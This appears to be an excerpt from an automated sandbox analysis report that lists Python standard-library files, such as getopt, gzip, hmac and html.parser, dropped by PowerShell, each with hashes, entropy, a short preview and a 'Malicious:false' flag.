                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..Path operations common to more than one OS..Do not use directly. The OS specific modules import the appropriate..functions from this module themselves..."""..import os..import stat....__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',.. 'getsize', 'isdir', 'isfile', 'islink', 'samefile', 'sameopenfile',.. 'samestat']......# Does a path exist?..# This is false for dangling symbolic links on systems that support them...def exists(path):.. """Test whether a path exists. Returns False for broken symbolic links""".. try:.. os.stat(path).. except (OSError, ValueError):.. return False.. return True......# This follows symbolic links, so both islink() and isdir() can be true..# for the same path on systems that support symlinks..def isfile(path):.. """Test whether a path is a regular file""".. try:.. st = os.stat(path).. except (OSError, ValueError):.. return False.. return stat.S_ISREG(st.st_m
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7703
                                                                                                                                                                                                              Entropy (8bit):4.587932802475573
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:oSGuBRjBdvQQ0ZW4X0RfUFCo/g/FF+44VJ3X0WNoO:oj0dH0ZW4+LBwJnkO
                                                                                                                                                                                                              MD5:2F404A8F69E1F65802672EC3D9BD7E22
                                                                                                                                                                                                              SHA1:EBFB72BD6FB62F906431D7C229E5C6704DCD68D6
                                                                                                                                                                                                              SHA-256:FE8C1422EFF6BE1280800A819718F88DCA24617F03BE09B91FE769F1483438E3
                                                                                                                                                                                                              SHA-512:8E6DA70EDE01B516C7AC798F824D44E44659F81A6B21EC3203C2E55482355C92A661653378AB2EAF166F8CC23CF709F9C99E6BB960A95DEA9D0D5A97476810F8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Parser for command line options.....This module helps scripts to parse the command line arguments in..sys.argv. It supports the same conventions as the Unix getopt()..function (including the special meanings of arguments of the form `-'..and `--'). Long options similar to those supported by GNU software..may be used as well via an optional third argument. This module..provides two functions and an exception:....getopt() -- Parse command line options..gnu_getopt() -- Like getopt(), but allow option and non-option arguments..to be intermixed...GetoptError -- exception (class) raised with 'opt' attribute, which is the..option involved with the exception..."""....# Long option support added by Lars Wirzenius <liw@iki.fi>...#..# Gerrit Holl <gerrit@nl.linux.org> moved the string-based exceptions..# to class-based exceptions...#..# Peter .strand <astrand@lysator.liu.se> added gnu_getopt()...#..# TODO for gnu_getopt():..#..# - GNU getopt_long_only mechanism..# - allow the caller to spe
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6175
                                                                                                                                                                                                              Entropy (8bit):4.440480314278831
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:PX8OzPyKo5dCMPUwl5o0FvZGNYAp83byrYl4Npx2AfeX2RMqdzNydJdCymzGFQ6Z:0OOVvTAlNppYsYmpxvxRMqtM39Q6qQJ
                                                                                                                                                                                                              MD5:0F8B3481C15E6805AFAD8EAE8E770FA1
                                                                                                                                                                                                              SHA1:25DDD71B1BD1F38E61A70C1B53E40F0752D328DF
                                                                                                                                                                                                              SHA-256:D2B77376A296CBDD0F659DA6CAB047426A4719D3F09949ABA8F334BD01E80593
                                                                                                                                                                                                              SHA-512:0E7EE49047339D8DF9D1F233C6EB47004B76D41EE324DACBBDDDA4C55D7C85CFBBFCDE3F9762B9B51AEC6007DEA4796852846A35B8094E61B8F9D472C838B348
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Utilities to get a password and/or the current user name.....getpass(prompt[, stream]) - Prompt for a password, with echo turned off...getuser() - Get the user name from the environment or password database.....GetPassWarning - This UserWarning is issued when getpass() cannot prevent.. echoing of the password contents while reading.....On Windows, the msvcrt module will be used....."""....# Authors: Piers Lauder (original)..# Guido van Rossum (Windows support and cleanup)..# Gregory P. Smith (tty support & GetPassWarning)....import contextlib..import io..import os..import sys..import warnings....__all__ = ["getpass","getuser","GetPassWarning"]......class GetPassWarning(UserWarning): pass......def unix_getpass(prompt='Password: ', stream=None):.. """Prompt for a password, with echo turned off..... Args:.. prompt: Written on stream to ask for the input. Default: 'Password: '.. stream: A writable file object to display the prompt. Def
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21966
                                                                                                                                                                                                              Entropy (8bit):4.538634415037831
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:8KE7Hoh/h9wzIhOPkvUKAWJLyR5Q5j7KdrmPECXKxlGt:8v2hEIh6kcKXZyraHKdrpxlGt
                                                                                                                                                                                                              MD5:D25CEAB4564001991B850B3FBF0F1588
                                                                                                                                                                                                              SHA1:96020C5932B754525F9C6998DB0DC4A406FE6C3B
                                                                                                                                                                                                              SHA-256:DA55E22F51BB369819FE4CC1201459C8F18CA948B6CA00137E6DFD7012814D83
                                                                                                                                                                                                              SHA-512:75582B3A6130E62C75D6591F8EF4227644AA136A53D64315C96FE340C2BC4AC2C1F590D3A9E4213354FBF37C13A6417EF8AED7F1D99329B46C7CC4FCDD20A595
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Internationalization and localization support.....This module provides internationalization (I18N) and localization (L10N)..support for your Python programs by providing an interface to the GNU gettext..message catalog library.....I18N refers to the operation by which a program is made aware of multiple..languages. L10N refers to the adaptation of your program, once..internationalized, to the local language and cultural habits....."""....# This module represents the integration of work, contributions, feedback, and..# suggestions from the following people:..#..# Martin von Loewis, who wrote the initial implementation of the underlying..# C-based libintlmodule (later renamed _gettext), along with a skeletal..# gettext.py implementation...#..# Peter Funk, who wrote fintl.py, a fairly complete wrapper around intlmodule,..# which also included a pure-Python implementation to read .mo files if..# intlmodule wasn't available...#..# James Henstridge, who also wrote a gettext.py module, wh
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8932
                                                                                                                                                                                                              Entropy (8bit):4.450827698660452
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:pFcyAlKumAroiAo/MO3LMRcjRDa/ySlZaxixLOTu7tTy:pyBgeMro/MOyc9Da/X40xnhu
                                                                                                                                                                                                              MD5:13A7EB4AA4C401CA703F736BC4DEC4DD
                                                                                                                                                                                                              SHA1:A23D5478F9A1BCFD8BE84CA2E8088370F788195C
                                                                                                                                                                                                              SHA-256:C99EF51E05BD23DEF219362EDE9AA76B393128D2A47C1AC0CF3912E330280BE0
                                                                                                                                                                                                              SHA-512:7BD16A509F980FA0A0E25178465A7A217DE7B57028CA3EA7E3D69A6D49AC16F4EF7390F079C87243547DAAE9109A4F8B8AA45434D7B7C5FA60E7CCEB6AB88CDB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Filename globbing utility."""....import contextlib..import os..import re..import fnmatch..import itertools..import stat..import sys....__all__ = ["glob", "iglob", "escape"]....def glob(pathname, *, root_dir=None, dir_fd=None, recursive=False,.. include_hidden=False):.. """Return a list of paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. Unlike fnmatch, filenames starting with a.. dot are special cases that are not matched by '*' and '?'.. patterns by default..... If `include_hidden` is true, the patterns '*', '?', '**' will match hidden.. directories..... If `recursive` is true, the pattern '**' will match any files and.. zero or more directories and subdirectories... """.. return list(iglob(pathname, root_dir=root_dir, dir_fd=dir_fd, recursive=recursive,.. include_hidden=include_hidden))....def iglob(pathname, *, root_dir=None, dir_fd=None, recursive=False,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9906
                                                                                                                                                                                                              Entropy (8bit):4.263228961608472
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:mNcRMEUR8YGCyTXFCRIBxgI1umbJrjMpxEIPktyaZN58Uff7yWPJyeTs7SD3Kqng:+iMEUmCyQMxgI0XEBX58UFXl+H
                                                                                                                                                                                                              MD5:0D738AD9A15E7CECDDE6A2CDC8D1BD8E
                                                                                                                                                                                                              SHA1:C8A824DFB20F05E0D8352CC32C2840FF97830D67
                                                                                                                                                                                                              SHA-256:9C23A989085259603C38E401B7ECC7D9C2F591C0FEB7B4B74F5721B113197541
                                                                                                                                                                                                              SHA-512:F328332BB3851F96878058D55BF8AC6DF34BCF8859E6526CFD54769781839D6A64CC34799C7732922D5C63076A0545A7D42703E35AB94B583989B06D68F2AE0C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from types import GenericAlias....__all__ = ["TopologicalSorter", "CycleError"]...._NODE_OUT = -1.._NODE_DONE = -2......class _NodeInfo:.. __slots__ = "node", "npredecessors", "successors".... def __init__(self, node):.. # The node this class is augmenting... self.node = node.... # Number of predecessors, generally >= 0. When this value falls to 0,.. # and is returned by get_ready(), this is set to _NODE_OUT and when the.. # node is marked done by a call to done(), set to _NODE_DONE... self.npredecessors = 0.... # List of successor nodes. The list can contain duplicated elements as.. # long as they're all reflected in the successor's npredecessors attribute... self.successors = []......class CycleError(ValueError):.. """Subclass of ValueError raised by TopologicalSorter.prepare if cycles.. exist in the working graph..... If multiple cycles exist, only one undefined choice among them will be reported.. and
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25553
                                                                                                                                                                                                              Entropy (8bit):4.537013140843265
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:4rr1HTcJt3MIIGYRDSErRaA2NBeT1r/LA5sRk8tQywQXBnW:JJtlAUvMutOQ8W
                                                                                                                                                                                                              MD5:A2BBDCCE322EFF4C7142E1FE01D916C3
                                                                                                                                                                                                              SHA1:B1F48E9BCBED9D38B99B7AC10F4F0B5A6545A4F2
                                                                                                                                                                                                              SHA-256:AD3098B20FDA695A7CAEC7326D2CF0ABEEB253D8CBD943D18B44719C6E208141
                                                                                                                                                                                                              SHA-512:5D33E1CA22A5A1E4630023341D0B7FF66C838B36388C458A57301B0866F11FEB2E33B82447E30FEF1B59C044166AB4927C98448B0664273AE9E34A820EC01C0E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Functions that read and write gzipped files.....The user of the file doesn't have to worry about the compression,..but random access is not allowed."""....# based on Andrew Kuchling's minigzip.py distributed with the zlib module....import struct, sys, time, os..import zlib..import builtins..import io..import _compression....__all__ = ["BadGzipFile", "GzipFile", "open", "compress", "decompress"]....FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16....READ, WRITE = 1, 2...._COMPRESS_LEVEL_FAST = 1.._COMPRESS_LEVEL_TRADEOFF = 6.._COMPRESS_LEVEL_BEST = 9....READ_BUFFER_SIZE = 128 * 1024.._WRITE_BUFFER_SIZE = 4 * io.DEFAULT_BUFFER_SIZE......def open(filename, mode="rb", compresslevel=_COMPRESS_LEVEL_BEST,.. encoding=None, errors=None, newline=None):.. """Open a gzip-compressed file in binary or text mode..... The filename argument can be an actual filename (a str or bytes object), or.. an existing file object to read from or write to..... The mode argument can be
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9602
                                                                                                                                                                                                              Entropy (8bit):4.879612409796633
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:KSBDUhawz9fJ+8lOVaX2B91c+jZIJ0tMmLfGfpR9eGe9IpeuR95x4SQZRvP5W2XB:KSBmfj2pDMmqpR+9u5d45ZRvIMWJiKi
                                                                                                                                                                                                              MD5:5F4B662810ACBFA30869931BDEE5FCB0
                                                                                                                                                                                                              SHA1:FE52497C8FCCC080D01804CE0F04C94D39008D63
                                                                                                                                                                                                              SHA-256:F0C8900585062C567A283CB782C3C867F86C38516E30F1F98A04FFA775B9A013
                                                                                                                                                                                                              SHA-512:9B74E620D2BBA0AF3C948D8A0B12F9ADBEDA6AE4E0F04A3FA1B1867B64C0D771DFD17A18C46E0C97785BEE1E020193FD375E109CDD20F69A3A318F68CB156414
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#. Copyright (C) 2005-2010 Gregory P. Smith (greg@krypto.org)..# Licensed to PSF under a Contributor Agreement...#....__doc__ = """hashlib module - A common interface to many hash functions.....new(name, data=b'', **kwargs) - returns a new hash object implementing the.. given hash function; initializing the hash.. using the given binary data.....Named constructor functions are also available, these are faster..than using new(name):....md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),..sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256.....More algorithms may be available on your platform but the above are guaranteed..to exist. See the algorithms_guaranteed and algorithms_available attributes..to find out what algorithm names can be passed to new().....NOTE: If you want the adler32 or crc32 hash functions they are available in..the zlib module.....Choose your hash function wisely.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):23627
                                                                                                                                                                                                              Entropy (8bit):4.577391750067338
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:zIRh8ImoQ2TaWDxr0K6rNK3WahBUmYcqV3+oxjTe+ENxd1S2+HGRh:zIb8ImTiA5cgxjT4xdGH+
                                                                                                                                                                                                              MD5:DA0A9B9E8C81A7158C59C0DE95F1A4C4
                                                                                                                                                                                                              SHA1:57F50A27C9D4EF9FFE5643223D0993A416FD3131
                                                                                                                                                                                                              SHA-256:5BDBF0450B6721F00FB0508FCE97625C9560A87CCAE8D551D94A3E220C8195E6
                                                                                                                                                                                                              SHA-512:C5A201AA2EAE6BFC2AD2AB4A69ABE65F35D54AF04AB458AFF51AE22795CABA7B02633B3DE3DD474A9242566DA6B877D81C0CA1111B790BFA069AA1E1798EEB85
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Heap queue algorithm (a.k.a. priority queue).....Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for..all k, counting elements from 0. For the sake of comparison,..non-existing elements are considered to be infinite. The interesting..property of a heap is that a[0] is always its smallest element.....Usage:....heap = [] # creates an empty heap..heappush(heap, item) # pushes a new item on the heap..item = heappop(heap) # pops the smallest item from the heap..item = heap[0] # smallest item on the heap without popping it..heapify(x) # transforms list into a heap, in-place, in linear time..item = heappushpop(heap, item) # pushes a new item and then returns.. # the smallest item; the heap size is unchanged..item = heapreplace(heap, item) # pops and returns smallest item, and adds.. # new item; the heap size is unchanged....Our API differs from textbook heap algorithms as follows:....-
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7935
                                                                                                                                                                                                              Entropy (8bit):4.550376078499665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:6ko2Qnkb5tQl/eFrNry3HYO429+036i5BhzRG8j:6ko2QM5tQlmFrNr/O4L03HhzRD
                                                                                                                                                                                                              MD5:88A1B95384888F83DC615F6A74FBE6F9
                                                                                                                                                                                                              SHA1:05B1DB3735DAE7501945A1D463A52091509DF110
                                                                                                                                                                                                              SHA-256:B3A1C91643BEB33A3D31EF4048500CD852C46967595D332ED64358D807205192
                                                                                                                                                                                                              SHA-512:4FCAA4ACF5F96B3C31AA90F88CC48758361C9C2AB12B5BCDC4437ED9A393DDF165CE852CDB5CA424C80F24172F29B918885664D4ADDE8EF0083C740ED7458441
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""HMAC (Keyed-Hashing for Message Authentication) module.....Implements the HMAC algorithm as described by RFC 2104..."""....import warnings as _warnings..try:.. import _hashlib as _hashopenssl..except ImportError:.. _hashopenssl = None.. _functype = None.. from _operator import _compare_digest as compare_digest..else:.. compare_digest = _hashopenssl.compare_digest.. _functype = type(_hashopenssl.openssl_sha256) # builtin type....import hashlib as _hashlib....trans_5C = bytes((x ^ 0x5C) for x in range(256))..trans_36 = bytes((x ^ 0x36) for x in range(256))....# The size of the digests returned by HMAC depends on the underlying..# hashing module used. Use digest_size from the instance of HMAC instead...digest_size = None......class HMAC:.. """RFC 2104 HMAC class. Also complies with RFC 4231..... This supports the API for Cryptographic Hash Functions (PEP 247)... """.. blocksize = 64 # 512-bit HMAC; can be changed in subclasses..... __slots__ = (..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4907
                                                                                                                                                                                                              Entropy (8bit):5.128389447372523
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ER1Op3Kv5VjLGXWa1OECg5KmXhtdVXLrVEWoFX2SCTSCXxF3t42xWQZxmQsl1RNe:EeEVjLGma0ECg5KmXBV7rDkCWCX/9QcB
                                                                                                                                                                                                              MD5:8E08D329C5B69E5EBC8E5E746F0F3475
                                                                                                                                                                                                              SHA1:42D44F91FAF5CA6FBBFB37FAB69A439366CA1E6E
                                                                                                                                                                                                              SHA-256:4AF8ED80247D7CC374E1D4A6FCC5244212A8DE668E40B11C0F328DB33C686FEF
                                                                                                                                                                                                              SHA-512:4F8E92BE17B73C02C9B170B421726CF3BDE7186287B95E56811B39FB9228BCFBD1B958F6A687AB0700CB3DF063502B304DDE70ED79A90BC0C53DC047D92D80E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..General functions for HTML manipulation..."""....import re as _re..from html.entities import html5 as _html5......__all__ = ['escape', 'unescape']......def escape(s, quote=True):.. """.. Replace special characters "&", "<" and ">" to HTML-safe sequences... If the optional flag quote is true (the default), the quotation mark.. characters, both double quote (") and single quote (') characters are also.. translated... """.. s = s.replace("&", "&amp;") # Must be done first!.. s = s.replace("<", "&lt;").. s = s.replace(">", "&gt;").. if quote:.. s = s.replace('"', "&quot;").. s = s.replace('\'', "&#x27;").. return s......# see https://html.spec.whatwg.org/multipage/parsing.html#numeric-character-reference-end-state...._invalid_charrefs = {.. 0x00: '\ufffd', # REPLACEMENT CHARACTER.. 0x0d: '\r', # CARRIAGE RETURN.. 0x80: '\u20ac', # EURO SIGN.. 0x81: '\x81', # <control>.. 0x82: '\u201a', # SINGLE LOW-9 QUOTATION MA
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4433
                                                                                                                                                                                                              Entropy (8bit):5.615915239975206
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:XnejUKUrNYG36aSJk57iX8Y3bNMjYRaUJJAikUe:XVSzpJkFiXJbNgW3Jn/e
                                                                                                                                                                                                              MD5:F65DD6868C57F44AFE1D784443F9A6B8
                                                                                                                                                                                                              SHA1:15D53B70369CBFE915D307D9B63BEC9BF2651A90
                                                                                                                                                                                                              SHA-256:8F596713D0B52A04B84F0CE52469F0D035F5E166014F860258EE9B81D0A14997
                                                                                                                                                                                                              SHA-512:E6411F992724585F1EBAD5E14F18CD2657761BAE11054D27C8A0E0CA0BDF46950B25542B5CE2D41A1A359ABAC3D4A318B775D301A278F06980509889C2A459A9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e+.........................8.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.dNd...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..d$d%..d&d'..i.d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI....Z.h.dJ..Z.dK..Z...e.j...................dL........Z.dM..Z.y.)Oz*.General functions for HTML manipulation.......N)...html5..escape..unescapec..........................|.j...................d.d.........}.|.j...................d.d.........}.|.j...................d.d.........}.|.r$|.j...................d.d.........}.|.j...................d.d.........}.|.S.).z.. Replace special characters "&", "<" and ">" to HTML-safe sequences.. If the optional flag quote is true (the default), the quotation mark. characters, both double quote (") and single quote (') characters are also. translated.. ..&z.&amp;..<z.&lt;..>z.&gt;.."z.&quot;..'z.&#x27;)...replace)...s..quotes.... .SC:\Users\Administrat
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):97717
                                                                                                                                                                                                              Entropy (8bit):6.265032277171077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:mHh9diX3e0u+4lPX5VYHaLnBAsEsZT1eIm/js5EC0cbXzVAjtVH4+Ao7VXNk3xBK:Wi3e0ulGaDBAPYw/jHdMX6jv4hee3xBK
                                                                                                                                                                                                              MD5:9BA10A511DF2E5C71858C8718BB538E4
                                                                                                                                                                                                              SHA1:E5DBD76EDB4DBBAA448A5EEAFB22971C786D9912
                                                                                                                                                                                                              SHA-256:A244DF797811D5A4BCBB797B65638C8EAB590B1DA54E3FF09AF42B2581959B58
                                                                                                                                                                                                              SHA-512:9CD769692DBE5BCFCB3F2DE7C852DB4875F7A77CB77E31B4DC6E1D8F09020FD4A7651677DC2956F5849159B06B3C6DD29810AD60922288E391921312C8FABB5D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e.0.........................`....d.Z.g.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..i.d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE....i.dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d...d.d...d.d...d.d...d.d...d.d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....i...d...d.....d...d.....d...d.....d...d.....d...d.....d...d...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17205
                                                                                                                                                                                                              Entropy (8bit):5.295200299884825
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ywUeKDRntdyD5rBIz0yGI0ZdXohaTDil4HHar25M0/wGLoYZB:ywUeKtry1rBIIZ1RTDi6aO/wdI
                                                                                                                                                                                                              MD5:DE1F71D5D0B685AED8835DCF57C623DF
                                                                                                                                                                                                              SHA1:1A97F6022BDEB6B591FFF1C4259DDF42587E8647
                                                                                                                                                                                                              SHA-256:93373BD1E484800C5D5CCFF084585D59752C967D6D04EA1278AEE3F55ED94074
                                                                                                                                                                                                              SHA-512:7F39543BFB2F29BF6C0AEFB10566309D66AA64106F036FB2972700940B5E7AA636F9B061BB7844848A107F6424A2BA04C6B97537D87C0EFE37D85143F750631B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........efD..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.g.Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.e.j ..........................Z...e.j...................d.........Z...e.j...................d.........Z...G.d...d.e.j(..........................Z.y.).z.A parser for HTML and XHTML......N)...unescape..HTMLParserz.[&<]z.&[a-zA-Z#]z%&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]z)&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]z.<[a-zA-Z]..>z.--\s*>z+([a-zA-Z][^\t\n\r\f />\x00]*)(?:\s|/(?!>))*z]((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*aF.... <[a-zA-Z][^\t\n\r\f />\x00]* # tag name. (?:[\s/]* # opt
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):78025
                                                                                                                                                                                                              Entropy (8bit):4.815868450525149
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:pawUaq4jxcGpzdKpp5Tiy2U2rAYMviMHLnqCpIFbkfjOqWNAh9Kkp3QbYMFZL/hQ:tUaq4jxHpzYpB7D
                                                                                                                                                                                                              MD5:154955F3B5FD44F2C48EEAAF58557FC7
                                                                                                                                                                                                              SHA1:3E26EBBC09DD47A7FA98663309C92FF836DE286A
                                                                                                                                                                                                              SHA-256:FA0B2845437AA3680AA6C33457D7A242DD303ED27C2A5073772D1C2B04D62473
                                                                                                                                                                                                              SHA-512:534BBADFFB08454C57690D24D603FDD00E78A4C709993BF479B0E4FFF11399C9CB2D3F9DE21C8504D865F25AC37F55B9CEC67FA806C1260777678A005675BF90
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""HTML character entity references."""....__all__ = ['html5', 'name2codepoint', 'codepoint2name', 'entitydefs']......# maps HTML4 entity name to the Unicode code point..name2codepoint = {.. 'AElig': 0x00c6, # latin capital letter AE = latin capital ligature AE, U+00C6 ISOlat1.. 'Aacute': 0x00c1, # latin capital letter A with acute, U+00C1 ISOlat1.. 'Acirc': 0x00c2, # latin capital letter A with circumflex, U+00C2 ISOlat1.. 'Agrave': 0x00c0, # latin capital letter A with grave = latin capital letter A grave, U+00C0 ISOlat1.. 'Alpha': 0x0391, # greek capital letter alpha, U+0391.. 'Aring': 0x00c5, # latin capital letter A with ring above = latin capital letter A ring, U+00C5 ISOlat1.. 'Atilde': 0x00c3, # latin capital letter A with tilde, U+00C3 ISOlat1.. 'Auml': 0x00c4, # latin capital letter A with diaeresis, U+00C4 ISOlat1.. 'Beta': 0x0392, # greek capital letter beta, U+0392.. 'Ccedil': 0x00c7, # latin capital letter C with c
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17510
                                                                                                                                                                                                              Entropy (8bit):4.314713635799775
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:/nuoCu1HTLuI2NLCGW/BojKL1BeiN82ATa:/nuoz1HUNL0BojQN8na
                                                                                                                                                                                                              MD5:2747AB5DFB91F1C7B53632330FEC404A
                                                                                                                                                                                                              SHA1:7CEFFD2DC594764AC3206CF6DCD15F4F6DD6891B
                                                                                                                                                                                                              SHA-256:ED37C8DED84AFEF74DFD671F8A20911F58B379BEF8F577739C05DBFA99115017
                                                                                                                                                                                                              SHA-512:BA7F7AE36FB923F241B399F8C358D914AC807E83FBCEA8C36EA0DFBB0BE4D2222AFA034708E915A6136C72D30C2210865218A1C70284535CF75007753EC980FB
                                                                                                                                                                                                              Malicious:false
